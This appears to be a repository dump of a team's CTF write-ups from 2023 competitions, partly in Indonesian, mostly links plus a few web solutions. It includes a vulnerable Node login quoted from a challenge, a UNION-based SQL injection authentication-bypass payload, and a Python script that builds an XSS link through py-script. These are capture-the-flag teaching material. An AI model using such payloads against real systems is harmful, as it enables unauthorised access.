"https://hackmd.io/@Solderet/SomeWriteupForWaniCTF2023-XogSiA") 23 | 24 | # daffainfo 25 | 26 | Writeup WaniCTF 2023 (English) 27 | 28 | ``` 29 | Category Challenge 30 | Crypto EZDORSA_Lv1 31 | Crypto EZDORSA_Lv2 32 | Crypto EZDORSA_Lv3 33 | Crypto pqqp 34 | Web Extract Service 1 35 | Reversing Just_Passw0rd 36 | Misc Guess 37 | Misc int_generator 38 | ``` 39 | 40 | https://github.com/daffainfo/ctf-writeup/tree/main/WaniCTF%202023 41 | 42 | -------------------------------------------------------------------------------- /2023/bbctf-2023/Pasted image 20230206061956.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206061956.png -------------------------------------------------------------------------------- /2023/bbctf-2023/Pasted image 20230206062058.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206062058.png -------------------------------------------------------------------------------- /2023/bbctf-2023/Pasted image 20230206062127.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206062127.png -------------------------------------------------------------------------------- /2023/bbctf-2023/Pasted image 20230206062218.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/bbctf-2023/Pasted image 20230206062218.png -------------------------------------------------------------------------------- /2023/ctf-after-dark-winter-2023/README.md: -------------------------------------------------------------------------------- 1 | # Spiteful XSS - Web 2 | ## Description 3 | Everyone keeps exploiting my site, so I deleted all the globals. 4 | 5 | ## Solve 6 | Pada challenge ini kita akan diberikan website sebagai berikut. 7 | https://spiteful-xss.acmcyber.com/ 8 | 9 |  10 | 11 | Website ini vulnerable dengan XSS, tetapi hampir semua builtins function tidak ada yang bisa dipakai. 12 | 13 | Saat kita melihat dibagian atas html kita akan melihat script dibawah ini, yang dimana script ini menghapus semua global variable, sehingga kita tidak bisa melakukan XSS. 14 | 15 | ```html 16 | 21 | ``` 22 | 23 | Bagaimana cara membypassnya. 24 | 25 | Disini kita bisa menggunakan `iframe`, iframe akan membuat DOM baru dimana disitu kita bisa menggunakan fungsi fungsi builtins yang ada. 26 | 27 | Payload XSS: 28 | ```html 29 | 34 | ``` 35 | 36 |  37 | 38 | 39 | Get flag: 40 | ```html 41 | 46 | ``` 47 | 48 |  49 | 50 | # Injection Perfection - Web 51 | ## Description 52 | After port scanning the acmcyber site, I found this hidden login page. After bruteforcing I discovered the user: joe, has the password: bruin, but I didn't find anything useful. Can you log in as admin? 53 | 54 | ## Solve 55 | Pada source code kita akan melihat endpoint yang vulnerable dengan SQL Injection. 56 | 57 | ```node 58 | const attemptLogin = (username, password) => { 59 | return new Promise((resolve, reject) => { 60 | db.get(`SELECT username, password FROM users WHERE username='${username}'`, async (err, row) => { 61 | if (err) 62 | return reject(err); 63 | else if (row === undefined) 64 | return reject('Invalid User'); 65 | else if (password === row.password) 66 | return resolve(`My favorite color is ${await getFavColor(row.username)}`); 67 | else 68 | return reject('incorrect password'); 69 | }); 70 | }) 71 | }; 72 | ...snip.. 73 | app.post('/', async (req, res) => { 74 | const username = req.body.username; 75 | const password = req.body.password; 76 | 77 | if (!username || !password) 78 | return res.status(400).send("Invalid Login"); 79 | 80 | try { 81 | return res.status(200).send(await attemptLogin(username, password)); 82 | } catch (err) { 83 | return res.status(400).send(err); 84 | } 85 | }); 86 | ``` 87 | 88 | Pada endpoint tersebut kita bisa mengirimkan post request yang berisi UNION based SQLI seperti berikut untuk membypass authentifikasi. 89 | 90 | ``` 91 | username='UNION/**/SELECT/**/"admin",'asd&password=asd 92 | ``` 93 | 94 | Setelah itu kita akan mendapatkan flagnya di response content. 95 | 96 | # Jester - web 97 | 98 | ```python 99 | from requests import * 100 | import re 101 | import math 102 | 103 | url = "https://jester.acmcyber.com/" 104 | 105 | # biar tak terjebak karna cookies pas request 106 | session = Session() 107 | r = session.get(url) 108 | cok = session.cookies.get_dict() 109 | 110 | # Ronde 1 = Pertambahan 111 | x1 = re.findall("What is (.*) \?<\/p>", r.content.decode('utf-8')) 112 | data = eval(x1[0]) 113 | 114 | ans = {'answer': data} 115 | print('r1 =', ans) 116 | 117 | r1 = session.post(url=url+'validate', data=ans) 118 | 119 | # Ronde 2 = Quadratic Equation 120 | x2 = re.findall("What are the roots of (.*) \?<\/p>", r1.content.decode()) 121 | 122 | quadratic = re.findall(r'\d+', x2[0]) 123 | coefficients = [int(coefficient) for coefficient in quadratic] 124 | coefficients.pop(1) 125 | 126 | x = coefficients[0] 127 | y = coefficients[1] 128 | z = coefficients[2] 129 | 130 | cal = (y**2) - (4*x*z) 131 | 132 | sol1 = (-y - math.sqrt(cal)) / (2*x) 133 | sol2 = (-y + math.sqrt(cal)) / (2*x) 134 | 135 | rd1 = round(sol1) 136 | rd2 = round(sol2) 137 | 138 | ans2 = {'answer1': rd1, 'answer2': rd2} 139 | print('r2 =',ans2) 140 | 141 | r2 = session.post(url=url+'validate', data=ans2) 142 | print(r2.content) 143 | ``` 144 | 145 | # Our Team Writeup 146 | 147 | Daffainfo: https://github.com/daffainfo/ctf-writeup/tree/main/CTF%20After%20Dark%20-%20Winter%202023 148 | 149 | | Category | Challenge 150 | | --- | --- | 151 | | Intro | Cookies 152 | | Intro | Secure Platform 153 | | Intro | Bagels 154 | | SQLi | Bank 155 | | SQLi | SQL Prevention-101 156 | | LFI | Star Poet Blog 157 | 158 | RisyadAR: https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/ 159 | 160 | - Website 161 | - [Birthday](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/Birthday/) 162 | - [Mean Girls](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/Mean%20Girls/) 163 | - [What's on the Menu?](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/What's%20on%20the%20Menu%3F/) 164 | - [Simple Calculator](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/Simple%20Calculator/) 165 | - [No Fetch?!?!](https://rizsyad.github.io/CTF-WriteUp/#/2023/After%20Dark%20Winter/Web/No%20Fetch%3F!%3F!/) 166 | 167 | # etc 168 | 169 | CTF source code: https://github.com/uclaacm/ctf-after-dark-w23 -------------------------------------------------------------------------------- /2023/damctf-2023/README.md: -------------------------------------------------------------------------------- 1 | # tcl-tac-toe - web 2 | ## Description 3 | Time to tackle tcl-tac-toe: the tricky trek towards top-tier triumph 4 | 5 | http://tcl-tac-toe.chals.damctf.xyz/ 6 | 7 | http://161.35.58.232/ 8 | 9 | ## Exploit 10 | An attachment is provided for this challenge, which reveals the use of an uncommon programming language, namely [tcl](https://wapp.tcl-lang.org/). 11 | 12 |  13 | 14 | Upon accessing the challenge's website, it becomes apparent that the site is hosting a game of tic-tac-toe, as depicted in the image below. 15 | 16 |  17 | 18 | The tic-tac-toe game happens to be impossible to solve because the bot cheats by taking two steps before it can lose. 19 | 20 | We will use Burp Suite to intercept what happens in the background. As shown in the image below, the bot uses a type of Message Authentication Token to verify whether the input has been tampered with or not. 21 | 22 |  23 | 24 | Tampering with the request will result in a response that looks like this: 25 | 26 |  27 | 28 | Is it possible to bypass this and obtain the flag? It appears that we can still play the game even if we have already lost, because the function check_win in the source code does not prevent this type of undefined behavior from occurring. 29 | 30 | ```tcl 31 | proc check_win {board} { 32 | set win {{1 2 3} {4 5 6} {7 8 9} {1 4 7} {2 5 8} {3 6 9} {1 5 9} {3 5 7}} 33 | foreach combo $win { 34 | foreach player {X O} { 35 | set count 0 36 | set index [lindex combo 0] 37 | foreach cell $combo { 38 | if {[lindex $board [expr {$cell - 1}]] != $player} { 39 | break 40 | } 41 | incr count 42 | } 43 | if {$count == 3} { 44 | return $player 45 | } 46 | } 47 | } 48 | # check if it's a tie 49 | if {[string first {-} $board] == -1} { 50 | return {tie} 51 | } 52 | return {-} 53 | } 54 | ``` 55 | 56 | We will now open the developer console and set a breakpoint on the if statement just before `location.reload` is invoked. 57 | 58 |  59 | 60 | Keep playing the game until the alert pops up, click ok. 61 | 62 |  63 | 64 | Once we hit the breakpoint, modify the value of message to a random value. 65 | 66 |  67 | 68 | After making the modification, win the game. 69 | 70 |  71 | 72 | After winning the game, the flag should be obtained. 73 | 74 |  75 | 76 | # Url-Stored-Notes - damctf - web 77 | Pada challenge ini kita akan diberikan source yang bisa di cek di google drive berikut https://drive.google.com/drive/folders/18HfXS1sXOB1OB14aPjyu2flsksibD4rs . 78 | 79 | Pada source code kita bisa menambahkan arbitary tag ke dalam html kecual `script` tag. Karna pada website tersebut menggunakan sebuah ekstensi py-script, jadi kita bisa menggunakan itu untuk mendapatkan XSS. 80 | 81 | Pada website kita akan menemukan halaman website seperti ini untuk membuat tagnya, dan ketika kita memencet share, akan muncul link seperti gambar dibawah ini. 82 | 83 |  84 | 85 | Disini kita bisa memanipulasi url tersebut menggunakan script berikut 86 | 87 | ```python 88 | from base64 import b64encode 89 | from lzma import compress, decompress 90 | import json 91 | from urllib.parse import quote_plus 92 | 93 | def encodeNotes(prompt, answer, tag): 94 | return b64encode(compress(json.dumps([{ 95 | "prompt": prompt, 96 | "answer": answer, 97 | "tag": tag, 98 | }]).encode())) 99 | 100 | a = encodeNotes("""js.eval('alert(1)')""", "#foo>", "py-script").decode() 101 | a = "http://localhost:8080/#"+a 102 | print(a) 103 | ``` 104 | 105 |  106 | 107 | # Ctf challenges git 108 | [https://gitlab.com/osusec/damctf-2023-challenges/](https://gitlab.com/osusec/damctf-2023-challenges/ "https://gitlab.com/osusec/damctf-2023-challenges/") 109 | 110 | # Chall Archive: 111 | 112 | [https://drive.google.com/drive/folders/16GdzGztpCepHJWzxZYmO4dfATQhE6ibR?usp=sharing](https://drive.google.com/drive/folders/16GdzGztpCepHJWzxZYmO4dfATQhE6ibR?usp=sharing "https://drive.google.com/drive/folders/16GdzGztpCepHJWzxZYmO4dfATQhE6ibR?usp=sharing") -------------------------------------------------------------------------------- /2023/deadsec-ctf-2023/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | archive: https://drive.google.com/drive/folders/11CKmFHEW63B62bUw9HlFv-7W4nZPrnin?usp=share_link 3 | --- 4 | 5 | ## Our Team Member Writeup 6 | 7 | - https://github.com/daffainfo/ctf-writeup/tree/main/DeadSec%20CTF%202023 8 | ``` 9 | Web FRSS 10 | Web Bing 11 | Web XEE1 12 | ``` 13 | 14 | - https://hyggehalcyon.gitbook.io/page/ctfs/2023/deadsec-ctf-2023 15 | ``` 16 | pwn-one-punch 17 | ``` 18 | -------------------------------------------------------------------------------- /2023/gray-cat-the-flag-2023-qualifier/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | archive: https://drive.google.com/drive/folders/15jPr0S6WbEteq0pJLvR1YKjWzDum79CQ?usp=sharing 3 | archive: https://github.com/NUSGreyhats/greyctf23-challs-public 4 | --- -------------------------------------------------------------------------------- /2023/m0leConCTF-2023/README.md: -------------------------------------------------------------------------------- 1 | ## Our Team Writeup 2 | - @dimasma0305 web-goldinopizza2: https://hackmd.io/@Solderet/m0leCon-ctf-exploiting-race-condition-goldinopizza2 -------------------------------------------------------------------------------- /2023/plaidCTF 2023/README.md: -------------------------------------------------------------------------------- 1 | Our Team Writeup 2 | === 3 | 4 | @Maulvi Alfansuri 5 | - https://maulvialf.medium.com/write-up-reversing-plaid-ctf-2023-2e3ba1e3d539 6 | 7 | · Treasure 8 | · CSS 9 | · Epilogue -------------------------------------------------------------------------------- /2023/wolvctf-2023/Pasted image 20230323041112.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/wolvctf-2023/Pasted image 20230323041112.png -------------------------------------------------------------------------------- /2023/wolvctf-2023/Pasted image 20230323041128.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TCP1P/TCP1P_CTF_writeup/77bd8cc1d8542853e3dafd3ccd7c1ce26593f268/2023/wolvctf-2023/Pasted image 20230323041128.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # TCP1P CTF Writeup 2 | Writeup from TCP1P CTF comunity. --------------------------------------------------------------------------------